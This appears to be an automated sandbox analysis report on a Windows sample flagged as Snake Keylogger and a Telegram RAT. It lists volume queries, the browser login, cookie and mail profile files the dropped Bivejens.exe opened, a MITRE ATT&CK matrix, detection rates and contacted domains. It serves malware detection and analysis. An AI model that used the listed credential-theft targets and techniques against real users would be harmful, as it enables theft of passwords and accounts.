Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bivejens.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\TjoY7n65om.exe

Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403359

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Bivejens.exe PID: 8056, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: Bivejens.exe PID: 8056, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Bivejens.exe PID: 8056, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	2 Obfuscated Files or Information	LSASS Memory	116 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 Software Packing	Security Account Manager	311 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	141 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TjoY7n65om.exe	50%	ReversingLabs	Win32.Spyware.Snakekeylogger
TjoY7n65om.exe	65%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Bivejens.exe	50%	ReversingLabs	Win32.Spyware.Snakekeylogger
C:\Users\user\AppData\Local\Temp\Bivejens.exe	65%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
drive.google.com	142.250.181.238	true	false	high
drive.usercontent.google.com	142.250.185.65	true	false	high
reallyfreegeoip.org	104.21.80.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
